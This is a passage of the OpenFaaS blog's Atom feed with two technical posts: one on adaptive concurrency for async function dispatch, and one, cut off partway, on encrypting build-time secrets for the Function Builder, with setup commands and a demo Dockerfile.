<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://www.openfaas.com/feed.xml" rel="self" type="application/atom+xml" /><link href="https://www.openfaas.com/" rel="alternate" type="text/html" /><updated>2026-04-10T09:04:56+00:00</updated><id>https://www.openfaas.com/feed.xml</id><title type="html">OpenFaaS - Serverless Functions Made Simple</title><subtitle>OpenFaaS - Serverless Functions Made Simple</subtitle><author><name>OpenFaaS Ltd</name></author><entry><title type="html">What Adaptive Concurrency Means for Async Functions</title><link href="https://www.openfaas.com/blog/adaptive-concurrency/" rel="alternate" type="text/html" title="What Adaptive Concurrency Means for Async Functions" /><published>2026-04-02T00:00:00+00:00</published><updated>2026-04-02T00:00:00+00:00</updated><id>https://www.openfaas.com/blog/adaptive-concurrency</id><content type="html" xml:base="https://www.openfaas.com/blog/adaptive-concurrency/"><![CDATA[<p>Learn how adaptive concurrency in the OpenFaaS queue-worker prevents overloading functions, reduces retries, and completes async batches faster — without per-function tuning.</p>

<h2 id="synchronous-vs-asynchronous-invocation">Synchronous vs. asynchronous invocation</h2>

<p>Any OpenFaaS function can be called synchronously (the default) or asynchronously via a queue. The difference is similar to calling a function and waiting for its return value, versus deferring work — like <code class="language-plaintext highlighter-rouge">defer</code> in Go, <code class="language-plaintext highlighter-rouge">async/await</code> in Node/Python, or submitting a job to a batch-processing queue.</p>

<p><strong>Synchronous — caller waits for the result</strong></p>

<p><img src="/images/2026-03-adaptive-concurrency/sync-flow.svg" alt="Synchronous invocation flow" /></p>

<p>The caller sends an HTTP request and waits. The gateway proxies it to the function and streams the response back. Simple and direct, but the caller is blocked for the full duration — if the function takes 5 minutes, the caller waits 5 minutes.</p>

<p><strong>Asynchronous — caller returns immediately, work is processed in the background</strong></p>

<p><img src="/images/2026-03-adaptive-concurrency/async-flow.svg" alt="Asynchronous invocation flow" /></p>

<p>The caller sends a request to <code class="language-plaintext highlighter-rouge">/async-function/&lt;name&gt;</code> and gets back a <code class="language-plaintext highlighter-rouge">202 Accepted</code> with an <code class="language-plaintext highlighter-rouge">X-Call-Id</code> within milliseconds. The gateway serialises the request onto a NATS JetStream queue. The queue-worker subscribes, pulls messages off the queue, and invokes the function. If an <code class="language-plaintext highlighter-rouge">X-Callback-Url</code> header was provided, the result is POSTed there when done.</p>

<p>This is a hybrid of a batch-job queue and deferred execution — think of it as submitting a job and optionally subscribing to the result. It is ideal for long-running work, batch processing, webhooks with tight response-time contracts, and fan-out pipelines.</p>
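<p>As a minimal sketch, an async invocation can be made with nothing but the standard library. This is illustrative client code, not part of any OpenFaaS SDK — the gateway address and the deployed <code class="language-plaintext highlighter-rouge">sleep</code> function are assumptions:</p>

```python
import urllib.request

GATEWAY = "http://127.0.0.1:8080"  # assumption: gateway reachable via port-forward

def build_async_request(function, body, callback_url=None):
    """POST to /async-function/<name>; the gateway replies 202 with an X-Call-Id."""
    req = urllib.request.Request(
        f"{GATEWAY}/async-function/{function}", data=body, method="POST")
    if callback_url:
        # The queue-worker POSTs the function's result here when the work is done.
        req.add_header("X-Callback-Url", callback_url)
    return req

def invoke_async(function, body, callback_url=None):
    # Requires a running gateway; returns the call id for correlating the callback.
    with urllib.request.urlopen(build_async_request(function, body, callback_url)) as resp:
        assert resp.status == 202
        return resp.headers.get("X-Call-Id")
```

<p>Calling <code class="language-plaintext highlighter-rouge">invoke_async("sleep", b"{}")</code> returns as soon as the message is queued, regardless of how long the function itself runs.</p>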

<h2 id="where-queue-worker-dispatch-falls-short">Where queue-worker dispatch falls short</h2>

<p>By default the queue-worker uses <em>greedy</em> dispatch — pulling messages and sending them to the function as fast as possible. This works well and is widely used in production, but for functions with strict concurrency limits it can cause excessive retries and requires careful per-function tuning for optimal performance.</p>

<p><em>Adaptive concurrency</em> is a new dispatch mode that fixes this. The queue-worker learns each function’s capacity and throttles dispatch to match automatically. It addresses two problems in particular:</p>

<ul>
  <li><strong>Known concurrency limit</strong> — the function has <code class="language-plaintext highlighter-rouge">max_inflight</code> set, capping concurrent requests per replica. The total capacity changes as replicas scale up and down.</li>
  <li><strong>Variable upstream capacity</strong> — the function depends on an external resource — a database, a third-party API — that can slow down or become overloaded. The function signals back-pressure by returning <code class="language-plaintext highlighter-rouge">429</code> itself.</li>
</ul>

<h2 id="how-adaptive-concurrency-solves-this">How adaptive concurrency solves this</h2>

<p>Adaptive concurrency removes the tuning burden. Instead of dispatching as fast as possible and dealing with rejections, the queue-worker <strong>learns how much work each function can handle</strong> and throttles the dispatch rate to match automatically.</p>

<p>The result:</p>

<ul>
  <li><strong>Fewer retries</strong> — requests are held in the queue until the function can accept them</li>
  <li><strong>Faster batch completion</strong> — no time wasted in exponential back-off</li>
  <li><strong>No per-function tuning</strong> — the algorithm adapts to each function’s behaviour on its own</li>
  <li><strong>Handles dynamic capacity</strong> — automatically adjusts as replicas scale up and down or upstream capacity changes</li>
</ul>

<p><img src="/images/2026-03-adaptive-concurrency/greedy-vs-adaptive-diagram.svg" alt="Greedy dispatch vs adaptive concurrency" /></p>

<h2 id="why-does-the-default-approach-generate-retries">Why does the default approach generate retries?</h2>

<p>Without adaptive concurrency, the queue-worker uses what we call a <em>greedy</em> dispatch algorithm. It pulls messages from the NATS JetStream queue and sends them to the function as fast as possible. When a function has <code class="language-plaintext highlighter-rouge">max_inflight</code> set — say to 5 per replica — the first 5 requests succeed, and the rest are rejected with <code class="language-plaintext highlighter-rouge">429</code> status codes.</p>

<p>The queue-worker then retries the rejected requests with exponential back-off. As the autoscaler adds more replicas, capacity increases, more requests succeed, and the backlog eventually clears. But during this ramp-up period, a large proportion of the requests are retried one or more times.</p>

<h2 id="how-adaptive-concurrency-works">How adaptive concurrency works</h2>

<p>Adaptive concurrency flips the approach. Instead of dispatching as fast as possible and dealing with rejections, it learns the function’s capacity and throttles dispatch to match.</p>

<p>The algorithm is feedback-driven:</p>

<ol>
  <li><strong>Start low</strong> — the queue-worker begins with a concurrency limit of zero for each function and grows it incrementally based on real responses.</li>
  <li><strong>Increase on success</strong> — after receiving a successful response, the limit is increased. After a sustained period without rejections, it scales up more aggressively.</li>
  <li><strong>Back off on rejection</strong> — after consecutive <code class="language-plaintext highlighter-rouge">429</code> responses, the limit is reduced with a safety margin below the discovered maximum to avoid repeatedly hitting the ceiling.</li>
  <li><strong>Proactive scaling</strong> — the queue-worker periodically checks whether there’s a backlog of queued work. If there is, it proactively increases the concurrency limit to fill available capacity.</li>
  <li><strong>Adapt to replica changes</strong> — as the autoscaler adds or removes replicas, the function’s ability to accept requests changes. The algorithm detects this through the success/failure feedback loop and adjusts accordingly.</li>
</ol>

<p>The net effect is that the queue-worker holds messages in the queue until the function can accept them, rather than sending them only to have them rejected and retried.</p>
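<p>The feedback loop above resembles an additive-increase/multiplicative-decrease (AIMD) controller. The following is an illustrative sketch only — the queue-worker's actual constants, thresholds, and growth rules are not reproduced here:</p>

```python
class AdaptiveLimiter:
    """Illustrative AIMD-style concurrency limiter (not the real queue-worker code)."""

    def __init__(self, backoff_factor=0.9):
        self.limit = 1            # start low, grow from real feedback
        self.discovered_max = None
        self.backoff_factor = backoff_factor

    def on_success(self):
        # Additive increase: probe for more capacity one slot at a time.
        self.limit += 1

    def on_rejection(self):
        # A 429 marks the ceiling; back off with a safety margin below it.
        self.discovered_max = self.limit
        self.limit = max(1, int(self.limit * self.backoff_factor) - 1)

    def on_backlog(self, pending):
        # Proactive scaling: if work is queued, probe upwards again.
        if pending > 0:
            self.limit += 1

limiter = AdaptiveLimiter()
for _ in range(10):
    limiter.on_success()       # limit climbs from 1 to 11
limiter.on_rejection()         # ceiling found at 11; back off below it
print(limiter.limit)           # → 8
```

<p>When the autoscaler adds replicas, successes resume and the limit climbs past the previously discovered ceiling — which is how the algorithm tracks dynamic capacity without configuration.</p>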

<h2 id="greedy-vs-adaptive-concurrency--a-side-by-side-comparison">Greedy vs. adaptive concurrency — a side-by-side comparison</h2>

<p>To show the difference, we ran the same workload with both approaches. We deployed the <code class="language-plaintext highlighter-rouge">sleep</code> function from the OpenFaaS store with a <code class="language-plaintext highlighter-rouge">max_inflight</code> of 5 and a maximum of 10 replicas, then submitted a batch of asynchronous invocations.</p>

<p><a href="/images/2026-03-adaptive-concurrency/greedy-vs-adaptive.png"><img src="/images/2026-03-adaptive-concurrency/greedy-vs-adaptive.png" alt="Side by side comparison of greedy vs adaptive concurrency" /></a></p>

<p>The key results:</p>

<ul>
  <li><strong>~50% faster completion time</strong> — adaptive concurrency completed the same batch of work approximately 50% quicker than the greedy approach.</li>
  <li><strong>Significantly fewer retries</strong> — with greedy dispatch, a large proportion of requests were retried (indicated by the rate of <code class="language-plaintext highlighter-rouge">429</code> responses in the Request Rate graph). Adaptive concurrency had far fewer, with the vast majority of requests completing on the first attempt.</li>
  <li><strong>Consistent invocation load</strong> — instead of the burst-and-retry pattern visible with the greedy approach (Gateway Inflight Requests graph), adaptive concurrency maintained a more constant rate of in-flight requests, smoothly utilising available capacity.</li>
  <li><strong>Lower overall resource usage</strong> — the greedy approach pushed the number of replicas higher in some tests due to the background noise from <code class="language-plaintext highlighter-rouge">429</code> retries inflating the perceived load on the system.</li>
</ul>

<p>The fundamental insight is simple: the fewer the retries, the lower the cumulative exponential back-off time, and the shorter the overall processing time.</p>
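<p>To put rough numbers on this, consider a doubling back-off with a cap — the initial wait, cap, and factor below are illustrative values, not the queue-worker's defaults:</p>

```python
def cumulative_backoff(retries, initial=1.0, cap=60.0, factor=2.0):
    """Total seconds a single message spends waiting across its retries."""
    total = 0.0
    wait = initial
    for _ in range(retries):
        total += wait
        wait = min(wait * factor, cap)  # doubling back-off, capped
    return total

# A message retried 6 times waits 1+2+4+8+16+32 = 63 seconds in back-off alone,
# on top of any actual processing time.
print(cumulative_backoff(6))  # → 63.0
```

<p>Every retry avoided removes its whole back-off interval from the batch's critical path, which is why the adaptive runs finish so much sooner.</p>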

<h2 id="when-to-use-adaptive-concurrency">When to use adaptive concurrency</h2>

<p>Adaptive concurrency helps whenever function capacity is limited — whether that limit is known upfront or varies at runtime. It works with any autoscaling mode (capacity, queue-based, RPS) and the queue-worker learns the capacity regardless of how replicas are being scaled.</p>

<h3 id="functions-with-a-known-concurrency-limit">Functions with a known concurrency limit</h3>

<p>When a function has <code class="language-plaintext highlighter-rouge">max_inflight</code> set, each replica can only handle a fixed number of concurrent requests. This is the most common case and is ideal for:</p>

<ul>
  <li><strong>PDF generation</strong> — headless Chrome with Puppeteer can only run 1–2 browsers per replica</li>
  <li><strong>ML inference</strong> — a GPU-bound model serving function where only one inference can run at a time (<code class="language-plaintext highlighter-rouge">max_inflight=1</code>)</li>
  <li><strong>Video transcoding / image processing</strong> — CPU or memory-intensive work where each replica handles a small number of jobs</li>
  <li><strong>Data ETL</strong> — batch processing pipelines where each step has a bounded throughput</li>
</ul>

<p>The right <code class="language-plaintext highlighter-rouge">max_inflight</code> value depends on your function — it may require experimentation and monitoring to find the optimal setting. Once set, adaptive concurrency handles the rest.</p>

<p><strong>Example: PDF generation at scale</strong></p>

<p>In a previous post, <a href="/blog/pdf-generation-at-scale-on-kubernetes/">Generate PDFs at scale on Kubernetes</a>, we showed how to run headless Chrome with Puppeteer to generate hundreds of PDFs. Each replica can only run a small number of browsers at once, so <code class="language-plaintext highlighter-rouge">max_inflight</code> is set to 1 or 2. When a batch of 600 pages hits the queue, the greedy dispatch approach floods the function with requests, most of which are rejected with 429s. To get good results, you had to carefully tune the retry configuration — <code class="language-plaintext highlighter-rouge">maxRetryWait</code>, <code class="language-plaintext highlighter-rouge">initialRetryWait</code>, and <code class="language-plaintext highlighter-rouge">maxRetryAttempts</code> — and even then a large portion of the processing time was spent in exponential back-off.</p>

<p>With adaptive concurrency, the queue-worker learns that each replica can handle just one or two browsers and throttles dispatch to match. As replicas scale up, the concurrency limit rises automatically. The queue drains faster because requests aren’t wasted on retries, and you don’t need to tune retry parameters to get optimal throughput.</p>

<h3 id="functions-with-variable-upstream-capacity">Functions with variable upstream capacity</h3>

<p>Not every capacity limit is known in advance. Some functions depend on external resources that can slow down or become temporarily unavailable:</p>

<ul>
  <li><strong>Database-backed functions</strong> — a downstream database under heavy load starts timing out or rejecting connections</li>
  <li><strong>Third-party API calls</strong> — an external service applies its own rate limiting or experiences degraded performance</li>
  <li><strong>Shared upstream services</strong> — a microservice your function depends on is overloaded and responding slowly</li>
</ul>

<p>In these cases, the function itself can return a <code class="language-plaintext highlighter-rouge">429</code> status code to signal back-pressure to the queue-worker. The adaptive concurrency algorithm responds the same way — it reduces the dispatch rate, waits, and probes for recovery. When the upstream resource recovers, the concurrency limit climbs back up automatically.</p>

<p>This means you don’t need <code class="language-plaintext highlighter-rouge">max_inflight</code> to benefit from adaptive concurrency. As long as your function returns <code class="language-plaintext highlighter-rouge">429</code> when it can’t handle more work, the queue-worker will adapt.</p>

<h2 id="try-it-out">Try it out</h2>

<p>Adaptive concurrency is enabled by default when using <code class="language-plaintext highlighter-rouge">function</code> mode in the JetStream queue-worker. If you’re already running function mode on the latest OpenFaaS release, you’re using it.</p>

<p>Deploy a function with a concurrency limit and capacity-based autoscaling:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli store deploy <span class="nb">sleep</span> <span class="se">\</span>
  <span class="nt">--label</span> com.openfaas.scale.max<span class="o">=</span>10 <span class="se">\</span>
  <span class="nt">--label</span> com.openfaas.scale.target<span class="o">=</span>5 <span class="se">\</span>
  <span class="nt">--label</span> com.openfaas.scale.type<span class="o">=</span>capacity <span class="se">\</span>
  <span class="nt">--label</span> com.openfaas.scale.target-proportion<span class="o">=</span>0.9 <span class="se">\</span>
  <span class="nt">--env</span> <span class="nv">max_inflight</span><span class="o">=</span>5
</code></pre></div></div>

<p>Submit a batch of asynchronous invocations:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>hey <span class="nt">-m</span> POST <span class="nt">-n</span> 500 <span class="nt">-c</span> 4 <span class="se">\</span>
  http://127.0.0.1:8080/async-function/sleep
</code></pre></div></div>

<p>Watch the Grafana dashboard for the queue-worker to see adaptive concurrency in action. You’ll see the concurrency limit climb as replicas scale up, then stabilise as capacity is matched.</p>

<p><img src="/images/2026-03-adaptive-concurrency/grafana-queue-depth-and-inflight.png" alt="Pending messages draining as inflight requests ramp up" /></p>
<blockquote>
  <p>The queue depth drops steadily as the queue-worker increases inflight requests in step with available capacity — no sudden spikes or idle periods.</p>
</blockquote>

<p><img src="/images/2026-03-adaptive-concurrency/grafana-load-replicas-and-status.png" alt="Current load, replicas, and invocation rate by status code" /></p>
<blockquote>
  <p>As replicas scale from 1 to 6, the in-flight load climbs smoothly to ~25. The <code class="language-plaintext highlighter-rouge">429</code> response rate stays low throughout — the queue-worker throttles dispatch to match capacity rather than flooding the function with requests.</p>
</blockquote>

<h2 id="further-reading">Further reading</h2>

<ul>
  <li><a href="https://docs.openfaas.com/openfaas-pro/jetstream/">Queue Worker documentation</a> — full reference for queue-worker configuration, including adaptive concurrency.</li>
  <li><a href="/blog/queue-based-scaling/">Queue-Based Scaling for Functions</a> — a complementary scaling mode that matches replicas to queue depth.</li>
  <li><a href="/blog/pdf-generation-at-scale-on-kubernetes/">Generate PDFs at scale on Kubernetes</a> — a real-world example of batch processing with concurrency limits that benefits from adaptive concurrency.</li>
  <li><a href="/blog/nested-functions-critical-path/">How to process your data the resilient way with back pressure</a> — an introduction to back pressure and concurrency limits in OpenFaaS.</li>
</ul>

<h2 id="wrapping-up">Wrapping up</h2>

<p>The greedy dispatch algorithm has served OpenFaaS customers well and continues to be a reliable option. But for workloads with hard concurrency limits, adaptive concurrency is a meaningful improvement: it completes the same work faster by avoiding unnecessary retries, requires less per-function tuning, and makes better use of available capacity as functions scale up and down.</p>

<p>It’s enabled by default in function mode — no changes needed to start benefiting from it.</p>

<p>To disable adaptive concurrency and revert to greedy dispatch, set the following in your OpenFaaS Helm values:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">jetstreamQueueWorker</span><span class="pi">:</span>
  <span class="na">adaptiveConcurrency</span><span class="pi">:</span> <span class="no">false</span>
</code></pre></div></div>

<p>If you have questions, or want to share results from your own workloads, reach out to us via your support channel of choice, whether that’s Slack, the Customer Community on GitHub, or email.</p>]]></content><author><name>OpenFaaS Ltd</name></author><category term="queue" /><category term="async" /><category term="autoscaling" /><category term="kubernetes" /><category term="batch-processing" /><summary type="html"><![CDATA[Learn how adaptive concurrency in the OpenFaaS queue-worker matches processing capacity to function replicas, reducing retries and completing async invocation batches faster.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://www.openfaas.com/images/2026-03-adaptive-concurrency/background.png" /><media:content medium="image" url="https://www.openfaas.com/images/2026-03-adaptive-concurrency/background.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">Encrypt build-time secrets for the Function Builder</title><link href="https://www.openfaas.com/blog/encrypted-build-secrets/" rel="alternate" type="text/html" title="Encrypt build-time secrets for the Function Builder" /><published>2026-03-24T00:00:00+00:00</published><updated>2026-03-24T00:00:00+00:00</updated><id>https://www.openfaas.com/blog/encrypted-build-secrets</id><content type="html" xml:base="https://www.openfaas.com/blog/encrypted-build-secrets/"><![CDATA[<p>Learn how to pass private registry tokens, API keys, and certificates into the Function Builder - encrypted end-to-end.</p>

<h2 id="introduction">Introduction</h2>

<p>Build secrets are already supported for <a href="https://docs.openfaas.com/cli/build/#plugins-and-build-time-secrets">local builds and CI jobs</a> using <code class="language-plaintext highlighter-rouge">faas-cli pro build</code>. In that workflow, the secret files live on the build machine and are mounted directly into Docker’s BuildKit. There’s no network transport involved.</p>

<p>The <a href="https://docs.openfaas.com/openfaas-pro/builder/">Function Builder API</a> is different. It’s designed for building untrusted code from third parties: your customers. A SaaS platform takes user-supplied source code, sends it to the builder over HTTP, and gets back a container image. The build happens in-cluster, without Docker, without root, and without sharing a Docker socket.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>                           Kubernetes cluster
                          ┌──────────────────────────────┐
  faas-cli /              │                              │
  Your API/dashboard      │  pro-builder      buildkit   │   registry
  ┌───────────────┐       │  ┌──────────┐  ┌──────────┐  │  ┌─────────┐
  │  source code  │──tar──│─▶│  unseal  │──│  build   │──│─▶│  image  │
  │  + sealed     │ HTTP  │  │  secrets │  │  + push  │  │  │         │
  │    secrets    │ HMAC  │  └──────────┘  └──────────┘  │  └─────────┘
  └───────────────┘       │                              │
                          └──────────────────────────────┘
</code></pre></div></div>

<p>The question is: what happens when those builds need access to private resources? A Python function might need to <code class="language-plaintext highlighter-rouge">pip install</code> from a private PyPI registry. A Node.js function might need packages from a private npm registry. A function might need a private CA certificate to pull dependencies from an internal mirror.</p>

<p>Since the Function Builder launched, most customers haven’t needed build-time credentials: Go users vendor their dependencies, and many teams use public registries. Others have found workarounds where they could. But as platforms mature and customer requirements evolve, the need for private package registries comes up.</p>

<p><a href="https://waylay.io">Waylay.io</a> has been using the Function Builder since 2021 to build functions for their industrial IoT and automation platform. As their customers started needing pip modules from private registries, they reached out and we worked together to develop a proper solution. Build secrets use Docker’s <code class="language-plaintext highlighter-rouge">--mount=type=secret</code> mechanism, which means credentials are only available during the specific <code class="language-plaintext highlighter-rouge">RUN</code> instruction that needs them  - they never end up in image layers and they’re not visible in <code class="language-plaintext highlighter-rouge">docker history</code>. We added NaCl box encryption (Curve25519 + XSalsa20-Poly1305) on top so that secrets are protected over the wire between the client and the builder, even over plain HTTP.</p>

<p>The result is a new feature in the Function Builder that lets you pass secrets into <code class="language-plaintext highlighter-rouge">RUN --mount=type=secret</code> instructions in your Dockerfiles. The secrets are encrypted client-side by <code class="language-plaintext highlighter-rouge">faas-cli</code> using the builder’s public key, included in the build tar, and decrypted in-memory by the builder just before the build runs. They never appear in image layers, they’re never written to disk in plaintext, and they never travel in plaintext over the wire, even if the connection between your client and the builder is plain HTTP.</p>

<h2 id="how-it-works">How it works</h2>

<p>The builder generates a Curve25519 keypair at startup. The public key is available via a <code class="language-plaintext highlighter-rouge">/publickey</code> endpoint. When <code class="language-plaintext highlighter-rouge">faas-cli</code> sends a build with secrets, it:</p>

<ol>
  <li>Encrypts each secret value independently using NaCl box</li>
  <li>Includes the sealed secrets in the build tar as <code class="language-plaintext highlighter-rouge">com.openfaas.secrets</code></li>
  <li>Signs the entire tar with HMAC-SHA256 (as before)</li>
</ol>

<p>The builder receives the tar, validates the HMAC, extracts the sealed file, decrypts each value using its private key, and passes them to BuildKit as <code class="language-plaintext highlighter-rouge">--mount=type=secret</code> mounts. After the build, the decrypted values are discarded.</p>

<p>The sealed file format uses per-value encryption with visible key names, so you can see which secrets are included without being able to read their values:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">version</span><span class="pi">:</span> <span class="s">v1</span>
<span class="na">algorithm</span><span class="pi">:</span> <span class="s">nacl/box</span>
<span class="na">key_id</span><span class="pi">:</span> <span class="s">TrZKmwyy</span>
<span class="na">public_key</span><span class="pi">:</span> <span class="s">TrZKmwyyTHBflZBF98y/j/2vn8wDZsMkX7yvUUGLUUM=</span>
<span class="na">secrets</span><span class="pi">:</span>
    <span class="na">api_key</span><span class="pi">:</span> <span class="s">&lt;encrypted&gt;</span>
    <span class="na">pip_index_url</span><span class="pi">:</span> <span class="s">&lt;encrypted&gt;</span>
</code></pre></div></div>

<p>This means the file is safe to commit to git. You get an audit trail of which keys were added or removed, and you can see when a value has changed by its ciphertext, all without needing the private key.</p>
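<p>A rough sketch of how such a file could be assembled follows. The <code class="language-plaintext highlighter-rouge">seal()</code> function below is a placeholder only — the real client encrypts each value with NaCl box (Curve25519 + XSalsa20-Poly1305) against the builder’s public key; the base64 stand-in here is <em>not</em> encryption and exists solely to show the file shape:</p>

```python
import base64
import json

def seal(public_key: str, value: bytes) -> str:
    # PLACEHOLDER: stands in for NaCl box encryption against `public_key`.
    # Do not use this in practice - it is reversible and provides no secrecy.
    return base64.b64encode(value[::-1]).decode()

def build_sealed_file(public_key: str, key_id: str, secrets: dict) -> dict:
    """Key names stay visible for auditability; only the values are opaque."""
    return {
        "version": "v1",
        "algorithm": "nacl/box",
        "key_id": key_id,
        "public_key": public_key,
        "secrets": {name: seal(public_key, val) for name, val in secrets.items()},
    }

sealed = build_sealed_file(
    "TrZKmwyyTHBflZBF98y/j/2vn8wDZsMkX7yvUUGLUUM=", "TrZKmwyy",
    {"api_key": b"s3cret", "pip_index_url": b"https://user:token@pypi.internal/simple"},
)
print(json.dumps(sealed, indent=2))
```

<p>Because the mapping keys are plaintext while the values are ciphertext, a git diff shows exactly which secrets were added, removed, or rotated.</p>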

<h2 id="part-a-setting-up-the-builder-with-build-secrets">Part A: Setting up the builder with build secrets</h2>

<p>The following steps let you try the full workflow on a local KinD cluster before moving to a live environment. You’ll need <code class="language-plaintext highlighter-rouge">faas-cli</code> 0.18.6 or later, <code class="language-plaintext highlighter-rouge">helm</code>, <code class="language-plaintext highlighter-rouge">kubectl</code>, <code class="language-plaintext highlighter-rouge">kind</code>, and an OpenFaaS for Enterprises license.</p>

<h3 id="create-a-test-cluster">Create a test cluster</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kind create cluster <span class="nt">--name</span> build-secrets-test
</code></pre></div></div>

<h3 id="create-the-namespace-and-license-secret">Create the namespace and license secret</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl create namespace openfaas

kubectl create secret generic openfaas-license <span class="se">\</span>
  <span class="nt">-n</span> openfaas <span class="se">\</span>
  <span class="nt">--from-file</span> <span class="nv">license</span><span class="o">=</span><span class="nv">$HOME</span>/.openfaas/LICENSE
</code></pre></div></div>

<h3 id="create-a-registry-credential-secret">Create a registry credential secret</h3>

<p>For testing, we’ll use <a href="https://ttl.sh">ttl.sh</a>, a free ephemeral registry that doesn’t require authentication:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cat</span> <span class="o">&lt;&lt;</span><span class="sh">'</span><span class="no">EOF</span><span class="sh">' &gt; ttlsh-config.json
{"auths":{}}
</span><span class="no">EOF

</span>kubectl create secret generic registry-secret <span class="se">\</span>
  <span class="nt">-n</span> openfaas <span class="se">\</span>
  <span class="nt">--from-file</span> config.json<span class="o">=</span>./ttlsh-config.json
</code></pre></div></div>

<p>For a private registry, see the <a href="https://github.com/openfaas/faas-netes/tree/master/chart/pro-builder">helm chart README</a> for how to configure authentication.</p>

<h3 id="generate-secrets">Generate secrets</h3>

<p>Two things are needed: a keypair for encrypting build secrets, and a payload secret for HMAC request signing.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli secret keygen
faas-cli secret generate <span class="nt">-o</span> payload.txt
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Wrote private key: key
Wrote public key:  key.pub
Key ID:            TrZKmwyy
</code></pre></div></div>

<h3 id="create-the-kubernetes-secrets">Create the Kubernetes secrets</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl create secret generic <span class="nt">-n</span> openfaas <span class="se">\</span>
  payload-secret <span class="nt">--from-file</span> payload-secret<span class="o">=</span>payload.txt

kubectl create secret generic <span class="nt">-n</span> openfaas <span class="se">\</span>
  pro-builder-build-secrets-key <span class="nt">--from-file</span> <span class="nv">key</span><span class="o">=</span>./key
</code></pre></div></div>

<h3 id="deploy-the-builder">Deploy the builder</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>helm repo add openfaas https://openfaas.github.io/faas-netes/
helm repo update

helm upgrade pro-builder openfaas/pro-builder <span class="se">\</span>
  <span class="nt">--install</span> <span class="nt">-n</span> openfaas <span class="se">\</span>
  <span class="nt">--set</span> buildSecrets.privateKeySecret<span class="o">=</span>pro-builder-build-secrets-key
</code></pre></div></div>

<p>Wait for it to be ready:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl rollout status deployment/pro-builder <span class="nt">-n</span> openfaas
</code></pre></div></div>

<h3 id="verify">Verify</h3>

<p>Port-forward and check the public key endpoint:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl port-forward <span class="nt">-n</span> openfaas deploy/pro-builder 8081:8080 &amp;

curl <span class="nt">-s</span> http://127.0.0.1:8081/publickey | jq
</code></pre></div></div>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"key_id"</span><span class="p">:</span><span class="w"> </span><span class="s2">"TrZKmwyy"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"algorithm"</span><span class="p">:</span><span class="w"> </span><span class="s2">"nacl/box"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"public_key"</span><span class="p">:</span><span class="w"> </span><span class="s2">"TrZKmwyyTHBflZBF98y/j/2vn8wDZsMkX7yvUUGLUUM="</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">key_id</code> is derived from the public key automatically. You don’t need to configure it. The builder is ready.</p>

<h2 id="part-b-building-a-function-with-secrets">Part B: Building a function with secrets</h2>

<p>Let’s walk through a complete example. We’ll create a function that reads a secret at build time using the classic watchdog.</p>

<h3 id="create-the-function">Create the function</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>faas-cli new <span class="nt">--prefix</span> ttl.sh/test-build-secrets <span class="se">\</span>
  <span class="nt">--lang</span> dockerfile sealed-test
</code></pre></div></div>

<p>Replace <code class="language-plaintext highlighter-rouge">sealed-test/Dockerfile</code> with:</p>

<div class="language-Dockerfile highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">FROM</span><span class="w"> </span><span class="s">ghcr.io/openfaas/classic-watchdog:latest</span><span class="w"> </span><span class="k">AS</span><span class="w"> </span><span class="s">watchdog</span>

<span class="k">FROM</span><span class="s"> alpine:3.22.0</span>

<span class="k">COPY</span><span class="s"> --from=watchdog /fwatchdog /usr/bin/fwatchdog</span>

<span class="k">RUN </span><span class="nb">mkdir</span> <span class="nt">-p</span> /home/app

<span class="k">RUN </span><span class="nt">--mount</span><span class="o">=</span><span class="nb">type</span><span class="o">=</span>secret,id<span class="o">=</span>api_key <span class="se">\
</span>    <span class="nb">cat</span> /run/secrets/api_key <span class="o">&gt;</span> /home/app/api_key.txt

<span class="k">ENV</span><span class="s"> fprocess="cat /home/app/api_key.txt"</span>

<span class="k">CMD</span><span class="s"> ["fwatchdog"]</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">--mount=type=secret,id=api_key</code> line tells BuildKit to mount the secret at <code class="language-plaintext highlighter-rouge">/run/secrets/api_key</code> during that <code class="language-plaintext highlighter-rouge">RUN</code> step. It’s only available during the build; it doesn’t end up in any image layer.</p>

<p>Edit <code class="language-plaintext highlighter-rouge">stack.yaml</code> to add <code class="language-plaintext highlighter-rouge">build_secrets</code>:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">version</span><span class="pi">:</span> <span class="m">1.0</span>
<span class="na">provider</span><span class="pi">:</span>
  <span class="na">name</span><span class="pi">:</span> <span class="s">openfaas</span>
  <span class="na">gateway</span><span class="pi">:</span> <span class="s">http://127.0.0.1:8080</span>
<span class="na">functions</span><span class="pi">:</span>
  <span class="na">sealed-test</span><span class="pi">:</span>
    <span class="na">lang</span><span class="pi">:</span> <span class="s">dockerfile</span>
